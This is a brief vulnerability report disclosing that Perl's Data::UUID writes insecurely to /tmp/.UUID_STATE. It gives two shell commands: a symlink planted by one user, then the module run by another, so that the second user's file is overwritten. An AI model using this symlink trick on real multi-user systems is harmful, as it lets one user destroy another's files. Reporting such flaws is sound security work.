Subject: Insecure usage of /tmp/.UUID_STATE
A symlink attack via Data::UUID seems to be possible.
As user2:
ln -s /home/user1/test-file /tmp/.UUID_STATE
As user1:
perl -MData::UUID -e 'Data::UUID->new'
Then /home/user1/test-file is overwritten. I could not achieve the same
result via /tmp/.UUID_NODEID, but I have not studied this carefully.